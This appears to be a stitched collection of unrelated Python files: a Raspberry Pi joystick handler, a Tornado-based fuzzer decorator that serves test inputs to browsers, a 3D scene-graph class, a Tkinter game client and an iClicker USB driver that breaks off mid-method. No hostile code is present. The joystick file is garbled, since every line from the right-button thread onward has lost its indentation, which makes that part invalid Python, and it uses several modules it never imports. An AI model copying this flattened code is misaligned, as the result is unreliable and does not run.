import sys
# Module-wide logger and the directory this file lives in.
mylogger = LogHandler.LogHandler("joystick_handler")
myfolder = os.path.dirname(os.path.abspath(__file__))
# IMPORT GPIO LIB (requires superuser privileges on the Pi)
try:
    import RPi.GPIO as GPIO
except RuntimeError:
    mylogger.logger.error("Error importing RPi.GPIO! This is probably because you need superuser privileges. You can achieve this by using 'sudo' to run your script")
def rpienv_source():
    """Source <myfolder>/.rpienv in bash and copy the resulting environment
    into os.environ. Exits the process when the file is missing.

    Fix: the original Python-2 `type(value) is unicode` check raised
    NameError on Python 3, which the except clause swallowed, so NO
    environment variable was ever actually set.
    """
    import subprocess
    if not os.path.exists(str(myfolder) + '/.rpienv'):
        print("[ ENV ERROR ] " + str(myfolder) + "/.rpienv path not exits!")
        sys.exit(1)
    command = ['bash', '-c', 'source ' + str(myfolder) + '/.rpienv -s && env']
    proc = subprocess.Popen(command, stdout=subprocess.PIPE)
    for line in proc.stdout:
        if isinstance(line, bytes):
            line = line.decode("utf-8")
        # Each env line is NAME=VALUE; keep everything after the first '='.
        name, sep, value = line.partition("=")
        if sep:
            os.environ[name] = value.rstrip()
    proc.communicate()
# Load environment variables from .rpienv before anything below reads them.
rpienv_source()
# IMPORT SHARED SOCKET MEMORY FOR VIRTUAL BUTTONS
try:
    clientmemdict_path = os.path.join(os.path.dirname(os.environ['CLIENTMEMDICT']))
    sys.path.append( clientmemdict_path )
    import clientMemDict
    socketdict = clientMemDict.SocketDictClient()
except Exception as e:
    # NOTE(review): socketdict stays None on failure; any consumer must
    # guard against that before calling methods on it.
    socketdict = None
    print("Socket client error: " + str(e))
# IMPORT HAPTIC ENGINE INTERFACE
try:
    haptic_eng_bin_path = os.path.join(myfolder, "../../haptic_engine/bin/")
    sys.path.append(haptic_eng_bin_path)
    import hapticenginge_interface as hei
    hei.hapt.set_channel_clean(False)  # not clean haptic engine channel under button uses it!
except Exception as e:
    print("Haptic engine import failed: " + str(e))
class JoystickHandler():
    def __init__(self, up_pin, down_pin, right_pin, left_pin, center_pin, haptic=True, mode="BCM"):
        """Configure the five joystick GPIO inputs and start the polling threads.

        up_pin..center_pin -- GPIO pin numbers (interpreted per *mode*)
        haptic             -- fire a haptic 'tap' when an event is consumed
        mode               -- "BCM" (default) or "BOARD" pin numbering
        """
        self.channels_dict = {"UP": up_pin,\
                              "DOWN": down_pin,\
                              "RIGHT": right_pin,\
                              "LEFT": left_pin,\
                              "CENTER": center_pin}
        self.haptic = haptic
        # set gpio channels
        if mode == "BOARD":
            GPIO.setmode(GPIO.BOARD)
        elif mode == "BCM":
            GPIO.setmode(GPIO.BCM)
        # Inputs use pull-downs, so an idle (unpressed) button reads 0.
        for key in self.channels_dict:
            GPIO.setup(self.channels_dict[key], GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
        ####################
        self.threads = []
        # Latest pending button name ("UP", ...) or None; consumed by
        # get_button_evenet().
        self.last_event_cmd = None
        self.button_thrd_timing = 0.1
        self.virtual_button_socketMemDict_watch_thrd_timing = 0.2
        self.button_threads_init()
    def button_threads_init(self):
        """Spawn one daemon polling thread per physical button plus the
        virtual-button watcher."""
        self.threads.append(threading.Thread(target=self.up_button_thrd))
        self.threads.append(threading.Thread(target=self.down_button_thrd))
        self.threads.append(threading.Thread(target=self.left_button_thrd))
        self.threads.append(threading.Thread(target=self.right_button_thrd))
        self.threads.append(threading.Thread(target=self.center_button_thrd))
        self.threads.append(threading.Thread(target=self.virtual_button_socketMemDict_watch_thrd))
        # write more threads here...
        for thd in self.threads:
            thd.daemon = True  # daemon threads die with the main program
            thd.start()
        time.sleep(0.1)
        # sleep a little while manage_pages_thread read contents
        time.sleep(0.5)
    def up_button_thrd(self):
        """Daemon loop: latch "UP" into last_event_cmd when the button fires."""
        while True:
            channel = self.channels_dict["UP"]
            if self.__button_event_get(channel, edge="up"):
                self.last_event_cmd = "UP"
            time.sleep(self.button_thrd_timing)
    def down_button_thrd(self):
        """Daemon loop: latch "DOWN" into last_event_cmd when the button fires."""
        while True:
            channel = self.channels_dict["DOWN"]
            if self.__button_event_get(channel, edge="up"):
                self.last_event_cmd = "DOWN"
            time.sleep(self.button_thrd_timing)
    def left_button_thrd(self):
        """Daemon loop: latch "LEFT" into last_event_cmd when the button fires."""
        while True:
            channel = self.channels_dict["LEFT"]
            if self.__button_event_get(channel, edge="up"):
                self.last_event_cmd = "LEFT"
            time.sleep(self.button_thrd_timing)
def right_button_thrd(self):
while True:
channel = self.channels_dict["RIGHT"]
if self.__button_event_get(channel, edge="up"):
self.last_event_cmd = "RIGHT"
time.sleep(self.button_thrd_timing)
def center_button_thrd(self):
while True:
channel = self.channels_dict["CENTER"]
if self.__button_event_get(channel, edge="up"):
self.last_event_cmd = "CENTER"
time.sleep(self.button_thrd_timing)
def virtual_button_socketMemDict_watch_thrd(self):
while True:
cmd = socketdict.get_parameter("oled", "joystick").rstrip().upper()
if cmd == "UP" or cmd == "DOWN" or cmd == "CENTER" or cmd == "RIGHT" or cmd == "LEFT":
self.last_event_cmd = cmd
time.sleep(0.5)
socketdict.set_parameter("oled", "joystick", "None")
time.sleep(self.virtual_button_socketMemDict_watch_thrd_timing)
def get_button_evenet(self, in_loop=True):
while in_loop:
if self.last_event_cmd is not None:
print("Button was pressed: " + str(self.last_event_cmd))
return_value = self.last_event_cmd
self.last_event_cmd = None
try:
if self.haptic:
hei.run_interface(option="tap")
except Exception as e:
print("Haptic engine call failed: " + str(e))
return return_value
time.sleep(0.08)
def simple_input_read(self, channel):
try:
while True:
state = GPIO.input(channel)
#print("Button raw input: " + str(state) + " channel: " + str(channel))
if state == 1:
return True
else:
return False
except KeyboardInterrupt:
return None
mylogger.logger.info("CTRL-C exit")
def __button_event_get(self, channel, edge="up"):
is_pressed = False
if edge == "down":
try:
state = self.simple_input_read(channel)
while state:
state = self.simple_input_read(channel)
time.sleep(0.08)
if not state:
is_pressed = True
mylogger.logger.info("Button was pressed")
if state is None:
break
return is_pressed
except KeyboardInterrupt:
return False
mylogger.logger.info("CTRL-C exit")
if edge == "up":
try:
state = self.simple_input_read(channel)
while not state:
state = self.simple_input_read(channel)
time.sleep(0.1)
if state:
is_pressed = True
mylogger.logger.info("Button was pressed")
if state is None:
break
return is_pressed
except KeyboardInterrupt:
return False
mylogger.logger.info("CTRL-C exit")
def joystick_wait_for_event(self, in_loop=True):
return self.get_button_evenet(in_loop=True)
def __del__(self):
try:
print('kill object: cleanup')
for key in self.channels_dict:
GPIO.cleanup(self.channels_dict[key])
hei.hapt.set_channel_clean(True) # set channel clean to True after button finished to use it
except Exception as e:
print(e)
# When imported as a module whose name contains "JoystickHandler",
# instantiate a module-level joystick singleton (BCM pin numbering).
if "JoystickHandler" in __name__:
    joystick = JoystickHandler(up_pin=22, down_pin=16, right_pin=27, left_pin=25, center_pin=24) # BCM mode
# Stand-alone smoke test: block on button events until CTRL-C.
if __name__ == "__main__":
    joystick = JoystickHandler(up_pin=22, down_pin=16, right_pin=27, left_pin=25, center_pin=24) # BCM mode
    while True:
        try:
            joystick.joystick_wait_for_event()
        except KeyboardInterrupt:
            break
|
tornado_decorator.py | # Copyright (c) 2016-2018 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import logging
import threading
from inspect import isclass, isroutine
from tornado.ioloop import IOLoop
from tornado.template import Template
from tornado.web import Application, RequestHandler
logger = logging.getLogger(__name__)
class TornadoDecorator(object):
    """
    Decorator for fuzzers to transport generated content through http. The
    decorator starts a Tornado server at the start of the fuzz job and returns
    a http url as test input. The SUT is expected to access the returned url and
    the decorated fuzzer is invoked on every GET access to that url. The
    response to the GET contains the generated test input prepended by a html
    meta tag to force continuous reloads in the SUT (or a ``window.close()``
    javascript content to force stopping the SUT if the decorated fuzzer cannot
    generate more tests). Useful for transporting fuzz tests to browser SUTs.

    **Mandatory parameter of the fuzzer decorator:**

    - ``port``: first port to start binding the started http server to (keeps
      incrementing until a free port is found).

    **Example configuration snippet:**

    .. code-block:: ini

        [sut.foo]
        # assuming that foo expects a http url as input, which it tries to access
        # afterwards

        [fuzz.foo-with-bar-over-http]
        sut=foo
        #fuzzer=...
        fuzzer.decorate(0)=fuzzinator.fuzzer.TornadoDecorator
        batch=5

        [fuzz.foo-with-bar-over-http.fuzzer.decorate(0)]
        port=8000
    """
    def __init__(self, port, **kwargs):
        self.port = int(port)
        # Disable all the output of the tornado server to avoid messing up with Fuzzinator's messages.
        hn = logging.NullHandler()
        hn.setLevel(logging.DEBUG)
        logging.getLogger('tornado.access').addHandler(hn)
        logging.getLogger('tornado.access').propagate = False
    def __call__(self, callable):
        # ``callable`` may be a plain routine or a fuzzer class; when it is a
        # class, Inherited subclasses it so __init__/__enter__/__exit__ chain.
        ancestor = object if isroutine(callable) else callable
        class Inherited(ancestor):
            decorator = self  # back-reference to the TornadoDecorator instance
            def __init__(self, *args, **kwargs):
                if hasattr(ancestor, '__init__'):
                    super().__init__(*args, **kwargs)
                self.index = 0            # number of tests served so far
                self.test = None          # last test produced by the wrapped fuzzer
                self.fuzzer_kwargs = dict()
                self.ioloop = None        # tornado IOLoop owned by the server thread
            def __call__(self, **kwargs):
                # Saving fuzzer args to make them available from the RequestHandlers
                # after passing a reference of ourselves.
                # Once past the first test, a None self.test means the wrapped
                # fuzzer is exhausted, so stop producing urls.
                if kwargs['index'] != 0 and self.test is None:
                    return None
                self.fuzzer_kwargs = kwargs
                return 'http://localhost:{port}?index={index}'.format(port=self.decorator.port, index=self.index)
            def __enter__(self, *args, **kwargs):
                if hasattr(ancestor, '__enter__'):
                    super().__enter__(*args, **kwargs)
                app = Application([
                    (r'/', self.MainHandler, dict(wrapper=self,
                                                  fuzzer=super().__call__ if isclass(callable) else callable))
                ])
                # Keep incrementing the port until a free one is found.
                while True:
                    try:
                        server = app.listen(self.decorator.port)
                        break
                    except OSError:
                        self.decorator.port += 1
                # The IOLoop runs on its own thread; server.stop() executes
                # only after ioloop.start() returns (i.e. after __exit__
                # schedules ioloop.stop()).
                def ioloop_thread():
                    self.ioloop = IOLoop.current()
                    self.ioloop.start()
                    server.stop()
                logger.debug('Tornado server started.')
                threading.Thread(target=ioloop_thread).start()
                return self
            def __exit__(self, *exc):
                suppress = False
                if hasattr(ancestor, '__exit__'):
                    suppress = super().__exit__(*exc)
                # add_callback is the thread-safe way to stop the loop from
                # outside the IOLoop's own thread.
                self.ioloop.add_callback(self.ioloop.stop)
                logger.debug('Shut down tornado server.')
                return suppress
            class MainHandler(RequestHandler):
                def __init__(self, application, request, wrapper, fuzzer):
                    super().__init__(application, request)
                    self.wrapper = wrapper
                    self.fuzzer = fuzzer
                def data_received(self, chunk):
                    pass
                def get(self):
                    # Default response tells the SUT to close itself (fuzzer
                    # exhausted or errored); overwritten on success below.
                    content = '<script>window.close();</script>'
                    try:
                        self.wrapper.fuzzer_kwargs['index'] = self.wrapper.index
                        self.wrapper.test = self.fuzzer(**self.wrapper.fuzzer_kwargs)
                        if self.wrapper.test is not None:
                            self.wrapper.index += 1
                            # Meta refresh makes the SUT reload after 1s and
                            # fetch the next test from the bumped index url.
                            content = Template('<meta http-equiv="refresh" content="1;url=?&{% raw request %}">{% raw test %}'). \
                                generate(request='index={index}'.format(index=self.wrapper.index), test=self.wrapper.test)
                    except Exception as e:
                        logger.warning('Unhandled exception in TornadoDecorator.', exc_info=e)
                    self.write(content)
        return Inherited
|
scene.py | import numpy as np
from ..points import transform_points
from ..grouping import group_rows
from ..util import is_sequence, is_instance_named
from ..transformations import rotation_matrix
from .transforms import TransformForest
from collections import deque
class Scene:
    '''
    A simple scene graph which can be rendered directly via pyglet/openGL,
    or through other endpoints such as a raytracer.

    Meshes and lights are added by name, which can then be moved by updating
    transform in the transform tree.
    '''
    def __init__(self,
                 node = None,
                 base_frame ='world'):
        # instance name : mesh name
        self.nodes = {}
        # mesh name : Trimesh object
        self.meshes = {}
        # instance name : per-node flags (e.g. visibility)
        self.flags = {}
        self.transforms = TransformForest(base_frame = base_frame)
        # NOTE(review): add_mesh(None) would fail on mesh.metadata;
        # presumably callers always pass a mesh or sequence -- verify.
        self.add_mesh(node)
        self.set_camera()
    def add_mesh(self, mesh):
        '''
        Add a mesh to the scene.

        If the mesh has multiple transforms defined in its metadata,
        a new instance of the mesh will be created at each transform.
        '''
        if is_sequence(mesh):
            for i in mesh:
                self.add_mesh(i)
            return
        if 'name' in mesh.metadata:
            name_mesh = mesh.metadata['name']
        else:
            name_mesh = 'mesh_' + str(len(self.meshes))
        self.meshes[name_mesh] = mesh
        if 'transforms' in mesh.metadata:
            transforms = np.array(mesh.metadata['transforms'])
        else:
            # single identity transform, shaped (1, 4, 4) to match the loop
            transforms = np.eye(4).reshape((-1,4,4))
        # one scene node per transform, all sharing the same mesh
        for i, transform in enumerate(transforms):
            name_node = name_mesh + '_' + str(i)
            self.nodes[name_node] = name_mesh
            self.flags[name_node] = {'visible':True}
            self.transforms.update(frame_to = name_node,
                                   matrix = transform)
    @property
    def bounds(self):
        '''
        Return the overall bounding box of the scene.

        Returns
        --------
        bounds: (2,3) float points for min, max corner
        '''
        corners = deque()
        for instance, mesh_name in self.nodes.items():
            # transform each mesh's local AABB corners into world frame
            transform = self.transforms.get(instance)
            corners.append(transform_points(self.meshes[mesh_name].bounds,
                                            transform))
        corners = np.vstack(corners)
        bounds = np.array([corners.min(axis=0),
                           corners.max(axis=0)])
        return bounds
    @property
    def extents(self):
        # (3,) edge lengths of the scene's bounding box
        return np.diff(self.bounds, axis=0).reshape(-1)
    @property
    def scale(self):
        # largest bounding-box edge, used as an overall size estimate
        return self.extents.max()
    @property
    def centroid(self):
        '''
        Return the center of the bounding box for the scene.

        Returns
        --------
        centroid: (3) float point for center of bounding box
        '''
        centroid = np.mean(self.bounds, axis=0)
        return centroid
    def duplicate_nodes(self):
        '''
        Return a sequence of node keys, where all keys in the group will
        be of the same mesh
        '''
        # group nodes by their mesh's (rounded) identifier vector
        mesh_ids = {k : m.identifier for k, m in self.meshes.items()}
        node_keys = np.array(list(self.nodes.keys()))
        node_ids = [mesh_ids[v] for v in self.nodes.values()]
        node_groups = group_rows(node_ids, digits=1)
        # NOTE(review): groups may have unequal lengths; np.array of a
        # ragged list yields an object array (deprecated in newer numpy)
        duplicates = np.array([node_keys[g] for g in node_groups])
        return duplicates
    def set_camera(self, angles=None, distance=None, center=None):
        '''
        Add or update the 'camera' frame in the transform tree.

        angles:   (3,) rotations about x and y (third component unused)
        distance: offset of the camera from center along +z
        center:   look-at point, defaults to the scene centroid
        '''
        if center is None:
            center = self.centroid
        if distance is None:
            distance = np.diff(self.bounds, axis=0).max()
        if angles is None:
            angles = np.zeros(3)
        translation = np.eye(4)
        translation[0:3,3] = center
        # back the camera off by 1.5x the scene size along z
        translation[2][3] += distance*1.5
        transform = np.dot(rotation_matrix(angles[0], [1,0,0], point=center),
                           rotation_matrix(angles[1], [0,1,0], point=center))
        transform = np.dot(transform, translation)
        self.transforms.update(frame_from = 'camera',
                               frame_to   = self.transforms.base_frame,
                               matrix     = transform)
    def dump(self):
        '''
        Append all meshes in scene to a list of meshes.
        '''
        result = deque()
        for node_id, mesh_id in self.nodes.items():
            transform = self.transforms.get(node_id)
            # copy so the stored mesh is not mutated by the bake
            current = self.meshes[mesh_id].copy()
            current.transform(transform)
            result.append(current)
        # object array of Trimesh instances
        return np.array(result)
    def export(self, file_type='dict64'):
        '''
        Export a snapshot of the current scene.

        Arguments
        ----------
        file_type: what encoding to use for meshes
                   ie: dict, dict64, stl

        Returns
        ----------
        export: dict with keys:
                meshes: list of meshes, encoded as per file_type
                transforms: edge list of transforms, eg:
                            ((u, v, {'matrix' : np.eye(4)}))
        '''
        export = {}
        export['transforms'] = self.transforms.export()
        export['nodes'] = self.nodes
        export['meshes'] = {name:mesh.export(file_type) for name, mesh in self.meshes.items()}
        return export
    def save_image(self, file_obj, resolution=(1024,768), **kwargs):
        '''
        Render the scene offscreen and save the image to file_obj.
        '''
        from .viewer import SceneViewer
        SceneViewer(self,
                    save_image = file_obj,
                    resolution = resolution,
                    **kwargs)
    def explode(self, vector=[0.0,0.0,1.0], origin=None):
        '''
        Explode a scene around a point and vector.
        '''
        if origin is None:
            origin = self.centroid
        centroids = np.array([self.meshes[i].centroid for i in self.nodes.values()])
        if np.shape(vector) == (3,):
            # offset each node along `vector`, scaled by how far its
            # centroid projects onto that vector from the origin
            vectors = np.tile(vector, (len(centroids), 1))
            projected = np.dot(vector, (centroids-origin).T)
            offsets = vectors * projected.reshape((-1,1))
        elif isinstance(vector, float):
            # scalar: push radially away from the origin
            offsets = (centroids-origin) * vector
        else:
            raise ValueError('Explode vector must by (3,) or float')
        for offset, node_key in zip(offsets, self.nodes.keys()):
            current = self.transforms[node_key]
            current[0:3,3] += offset
            self.transforms[node_key] = current
    def show(self, block=True, **kwargs):
        '''
        Open a pyglet window displaying the scene.

        block: if False the viewer runs on a background thread.
        '''
        # this imports pyglet, and will raise an ImportError
        # if pyglet is not available
        from .viewer import SceneViewer
        def viewer():
            SceneViewer(self, **kwargs)
        if block:
            viewer()
        else:
            from threading import Thread
            # NOTE(review): kwargs are captured by the closure AND passed to
            # Thread; non-empty kwargs would make viewer(**kwargs) fail --
            # confirm intended usage.
            Thread(target = viewer, kwargs=kwargs).start()
|
PlayerGUI.py | from tkinter import *
from tkinter import ttk
import random
###############NETWORK################
import socket
import threading
def SendMessage(data):
    """Send *data* to the game server over TCP and print the reply.

    Opens a fresh connection per call.  BUG FIX: the socket used to leak
    when connect/send/recv raised; the `with` block now guarantees it is
    closed on both success and failure.
    """
    #data = input('Send: ')
    server_ip = '192.168.1.150'
    port = 8000
    with socket.socket() as server:
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.connect((server_ip, port))
        server.send(data.encode('utf-8'))
        data_server = server.recv(1024).decode('utf-8')
        print('Data from Server: ', data_server)
def RunSendMessage(data):
    """Fire-and-forget: deliver *data* to the server on a background thread."""
    worker = threading.Thread(target=SendMessage, args=(data,))
    worker.start()
def PopupName():
    """Popup window asking the player for a name and a room code.

    On submit, the values are copied into the module-level StringVars
    (v_username / v_codenumber), a START message is sent to the server
    and the popup is hidden.
    """
    popup = Toplevel()
    popup.attributes('-topmost', True)
    popup.geometry('300x250')
    popup.title('Name')
    # entry field for the player name
    ttk.Label(popup, text='Name').pack()
    v_name = StringVar()
    entry_name = ttk.Entry(popup, textvariable=v_name, font=('Angsana New', 20))
    entry_name.pack(pady=10)
    # entry field for the room code
    ttk.Label(popup, text='Room Code').pack()
    v_code = StringVar()
    entry_code = ttk.Entry(popup, textvariable=v_code, font=('Angsana New', 20))
    entry_code.pack(pady=10)

    def EnterGame():
        # publish the entered values and notify the server
        name = v_name.get()
        code = v_code.get()
        v_username.set(name)
        v_codenumber.set(code)
        RunSendMessage('START|{}|{}'.format(code, name))
        popup.withdraw()

    enter_button = ttk.Button(popup, text='Enter Game', command=EnterGame)
    enter_button.pack(ipadx=20, ipady=10)
    popup.mainloop()
# Main application window.
GUI = Tk()
GUI.geometry('700x800')
GUI.title('PlayerGUI')
FONT = ('Angsana New',25)
buttonStyle = ttk.Style()
buttonStyle.configure('my.TButton',font=FONT)
######NAME#######
# Player name and room code, filled in by PopupName().
v_username = StringVar()
LName = ttk.Label(GUI,textvariable=v_username,font=FONT)
LName.place(x=30,y=30)
v_codenumber = StringVar()
LCode = ttk.Label(GUI,textvariable=v_codenumber,font=FONT)
LCode.place(x=30,y=70)
######SCORE#######
L1 = ttk.Label(GUI,text='Current Score',font=FONT)
L1.pack(pady=30)
point = StringVar()
point.set('Point')
L11 = ttk.Label(GUI,textvariable=point,font=FONT)
L11.pack()
######BUTTON FIGHT#######
# NOTE(review): the Fight button has no command bound yet.
B1 = ttk.Button(GUI,text='Fight',style='my.TButton')
B1.pack(pady=50)
L2 = ttk.Label(GUI,text='Total Score',font=FONT)
L2.pack(pady=30)
sumpoint = StringVar()
sumpoint.set('Sumpoint')
L21 = ttk.Label(GUI,textvariable=sumpoint,font=FONT)
L21.pack()
# Scoreboard table with placeholder rows.
scoreboard = ttk.Treeview(GUI)
scoreboard.pack(pady=50)
scoreboard['columns'] = ('no','total')
scoreboard['show'] = 'headings'
scoreboard.column('no',width=100,anchor='c')
scoreboard.column('total',width=100,anchor='c')
scoreboard.heading('no',text='No.')
scoreboard.heading('total',text='Total')
scoreboard.insert('','end',values=('1',100))
scoreboard.insert('','end',values=('2',100))
scoreboard.insert('','end',values=('3',100))
# Ask for the player's name before entering the main loop.
PopupName()
GUI.mainloop() |
iclickerpoll.py | #!/usr/bin/env python
from __future__ import print_function
import logging
import sys
import threading
import time
from array import array
from collections import Counter, defaultdict
import usb.core
import usb.util
from usb import USBError
log = logging.getLogger(__name__)
class Command(object):
    """A single 64-byte USB packet exchanged with the iClicker base.

    May be constructed from a hex string ("01 10 ..."), any sequence of
    byte values, or nothing (an all-zero packet).  The payload is always
    truncated/zero-padded to exactly 64 bytes.
    """
    def __init__(self, byte_array=None):
        if byte_array is None:
            byte_array = []
        if type(byte_array) is str:
            # If we passed in a string, assume it is a string of hex characters and turn it into bytes
            byte_array = byte_array.replace(' ', '')
            byte_array = array('B', (int(byte_array[i:i+2], 16) for i in range(0, len(byte_array), 2)))
        elif type(byte_array) is bytes:
            pass
        # Make sure we have a 64 byte packet by padding with zeros
        self.bytes = array('B', byte_array[:64])
        self.bytes.extend([0]*(64-len(self.bytes)))
    def __getitem__(self, key):
        return self.bytes[key]
    def __setitem__(self, key, value):
        # BUG FIX: was `self.bytes[key] = valuse` (NameError on every call)
        self.bytes[key] = value
    def __repr__(self):
        """ return the command as a hex string """
        SPLIT_BY_N_CHARS = 16
        hex_string = ''.join("%02X" % x for x in self.bytes)
        return ' '.join(hex_string[i:i+SPLIT_BY_N_CHARS] for i in range(0, len(hex_string), SPLIT_BY_N_CHARS)).lower()
    def __eq__(self, other):
        return self.bytes == other.bytes
    def __ne__(self, other):
        return self.bytes != other.bytes
    def as_bytes(self):
        # BUG FIX: array.tostring() was removed in Python 3.9;
        # tobytes() is its exact replacement (tostring was an alias).
        return self.bytes.tobytes()
    @staticmethod
    def clicker_id_from_bytes(byte_seq):
        """ Given a sequence of three bytes, computes the last byte
            in the clicker id and returns it as hex """
        # Make a copy since we'll be appending to it
        byte_seq = byte_seq[:]
        # the fourth id byte is the XOR checksum of the first three
        byte_seq.append(byte_seq[0] ^ byte_seq[1] ^ byte_seq[2])
        return ''.join("%02X" % b for b in byte_seq)
    def _process_alpha_clicker_response(self):
        """ This method will return information about an alpha clicker response """
        ret = {'type': 'ClickerResponse', 'poll_type': 'Alpha'}
        ret['clicker_id'] = self.clicker_id_from_bytes(self.bytes[3:6])
        # Responses start with 0x81 for A and work their way up, so ascii-recode them
        ret['response'] = chr(self.bytes[2] - 0x81 + 65)
        ret['seq_num'] = self.bytes[6]
        return ret
    def info(self):
        """ return all the information we know about the command """
        byte0 = self.bytes[0]
        byte1 = self.bytes[1]
        ret = { 'type': 'unknown', 'raw_command': self.__repr__() }
        if byte0 == 0x01:
            # 0x01-prefixed packets are host->base control commands
            if byte1 == 0x10:
                ret['type'] = 'SetFrequency'
                ret['freq1'] = self.bytes[2] - 0x21
                ret['freq2'] = self.bytes[3] - 0x41
            if byte1 == 0x11:
                ret['type'] = 'StartPolling'
            if byte1 == 0x12:
                ret['type'] = 'StopPolling'
            if byte1 == 0x18:
                if self.bytes[2] == 0x01 and self.bytes[3] == 0x00:
                    ret['type'] = 'ResetBase'
            if byte1 == 0x19:
                ret['type'] = 'SetPollType'
                ret['quiz_type'] = self.bytes[2] - 0x67
            if byte1 == 0x2d:
                ret['type'] = 'SetIClicker2Protocol'
        elif byte0 == 0x02:
            # 0x02-prefixed packets are base->host data
            if byte1 == 0x13:
                ret.update(self._process_alpha_clicker_response())
            if byte1 == 0x1a:
                pass
        return ret
    def response_info(self):
        """ Returns a list containing every response in this command.
            Since a 64 byte command can contain two 32 byte clicker responses,
            this separates them and returns a list with both their infos """
        info1 = Command(self.bytes[:32]).info()
        info2 = Command(self.bytes[32:]).info()
        ret = []
        if info1['type'] == 'ClickerResponse':
            ret.append(info1)
        if info2['type'] == 'ClickerResponse':
            ret.append(info2)
        return ret
class IClickerBase(object):
    """ This class handles all the hardware-related aspects of talking
        with the iClicker base unit. """
    VENDOR_ID = 0x1881
    PRODUCT_ID = 0x0150
    def __init__(self):
        self.device = None                # usb.core.Device, set by get_base()
        self.last_set_screen_time = 0     # wall-clock of last LCD write
        self.has_initialized = False
        # pyusb is not threadsafe, so we need to aquire a lock for all usb operations
        self.usb_lock = threading.RLock()
        self.screen_buffer = [' '*16, ' '*16]   # desired text for the 2x16 LCD
        self.screen_queue = [False, False] # A list of which line of the screen needs to be updated
    def _write(self, data):
        """ raw-write of data to self.device"""
        with self.usb_lock:
            # HID SET_REPORT control transfer carrying the 64-byte packet
            self.device.ctrl_transfer(0x21, 0x09, 0x0200, 0x0000, data.as_bytes())
    def _read(self, timeout=100):
        """ read a packet of data from self.device"""
        with self.usb_lock:
            # 0x83 is the interrupt IN endpoint; raises USBError on timeout
            ret = Command(self.device.read(0x83, 64, timeout=timeout))
        return ret
    def _syncronous_write(self, data, timeout=100):
        """ writes data to self.device expecting a reponse of "?? ?? aa"
            where "?? ??" are the first two bytes of data """
        expected_response = Command([data[0], data[1], 0xaa])
        self._write(data)
        response = self._read(timeout=timeout)
        if response != expected_response:
            raise IOError("Attempted syncronuous write of {0} and got {1} (expecting {2})".format(data.__repr__(), response.__repr__(), expected_response.__repr__()))
    def _write_command_sequence(self, seq):
        """ Write a sequence of commands to the usb device and read all the responses """
        # NOTE(review): after writing, responses are drained until the read
        # times out (USBError) -- the replies themselves are discarded.
        for cmd in seq:
            self._write(cmd)
            try:
                while True:
                    response = self._read()
            except USBError:
                pass
    def read(self, timeout=100):
        """Read one packet; returns None instead of raising on timeout/error."""
        try:
            # NOTE(review): _read() already returns a Command, so this wraps
            # a Command in a Command (harmless: Command slicing copies bytes).
            return Command(self._read(timeout))
        except:  # NOTE(review): bare except also hides non-USB errors
            return None
    def get_base(self):
        """ Looks on the USB bus for an iClicker device """
        with self.usb_lock:
            self.device = usb.core.find(idVendor=self.VENDOR_ID, idProduct=self.PRODUCT_ID)
            if self.device is None:
                raise ValueError('Error: no iclicker device found')
            if self.device.is_kernel_driver_active(0):
                log.warning("The iClicker seems to be in use by another device--Forcing reattach.")
                self.device.detach_kernel_driver(0)
            self.device.set_configuration()
    def set_base_frequency(self, code1='a', code2='a'):
        """ Sets the operating frequency """
        def code_to_number(code):
            if type(code) is str:
                # 'a' == 1, 'b' == 2, etc.
                return ord(code.lower()) - 97
            return code
        # the sleeps give the base time to settle between commands
        time.sleep(0.2)
        cmd = Command([0x01, 0x10, 0x21 + code_to_number(code1), 0x41 + code_to_number(code2)])
        self._syncronous_write(cmd)
        time.sleep(0.2)
        cmd = Command([0x01, 0x16])
        self._syncronous_write(cmd)
        time.sleep(0.2)
    def set_version_two_protocol(self):
        """ Sets the base unit to use the iClicker version 2 protocol """
        cmd = Command([0x01, 0x2d])
        self._write(cmd)
        time.sleep(0.2)
    def set_poll_type(self, poll_type='alpha'):
        """ Sets the poll type to 'alpha', 'numeric', or 'alphanumeric' """
        log.debug('Setting poll type to {0}'.format(poll_type))
        poll_type = {'alpha': 0, 'numeric': 1, 'alphanumeric': 2}[poll_type]
        cmd = Command([0x01, 0x19, 0x66+poll_type, 0x0a, 0x01])
        self._write(cmd)
        time.sleep(0.2)
    #TODO: There are still a lot of unknowns here...right now
    # it just repeates what was snooped from USB on Windows
    def initialize(self, freq1='a', freq2='a'):
        """Run the snooped handshake sequence; must precede start_poll()."""
        COMMAND_SEQUENCE_A = [
            Command("01 2a 21 41 05"),
            Command("01 12"),
            Command("01 15"),
            Command("01 16"),
        ]
        COMMAND_SEQUENCE_B = [
            Command("01 29 a1 8f 96 8d 99 97 8f"),
            Command("01 17 04"),
            Command("01 17 03"),
            Command("01 16"),
        ]
        if self.device is None:
            self.get_base()
        self.set_base_frequency(freq1, freq2)
        self._write_command_sequence(COMMAND_SEQUENCE_A)
        self.set_version_two_protocol()
        self._write_command_sequence(COMMAND_SEQUENCE_B)
        self.has_initialized = True
    def start_poll(self, poll_type='alpha'):
        """Begin collecting clicker votes of the given poll type."""
        COMMAND_SEQUENCE_A = [
            Command("01 17 03"),
            Command("01 17 05"),
        ]
        command_START_POLL = Command("01 11")
        self._write_command_sequence(COMMAND_SEQUENCE_A)
        self.set_poll_type(poll_type)
        self._write(command_START_POLL)
    def stop_poll(self):
        """Stop collecting votes (snooped shutdown sequence)."""
        COMMAND_SEQUENCE_A = [
            Command("01 12"),
            Command("01 16"),
            Command("01 17 01"),
            Command("01 17 03"),
            Command("01 17 04"),
        ]
        self._write_command_sequence(COMMAND_SEQUENCE_A)
    def _set_screen(self, line=0):
        """ Sets the line @line to the characters specified by self.screen_buffer[line].
            This command messes up the screen if it is sent too frequently. """
        # 0x13 targets the top LCD line, 0x14 the bottom one
        if line == 0:
            cmd = [0x01, 0x13]
        else:
            cmd = [0x01, 0x14]
        # Make sure we are writing only 16 characters to the screen
        string = self.screen_buffer[line]
        string = string[:16]
        string = string + ' '*(16-len(string))
        cmd.extend(ord(c) for c in string)
        cmd = Command(cmd)
        self.last_set_screen_time = time.time()
        self._write(cmd)
    def set_screen(self, string, line=0, force_update=False):
        """ Sets the line @line to the characters specified by @string.
            This command messes up the screen if it is sent too frequently,
            so an automatic delay is added between issuances of set_screen """
        MIN_SCREEN_UPDATE_TIME = 0.1
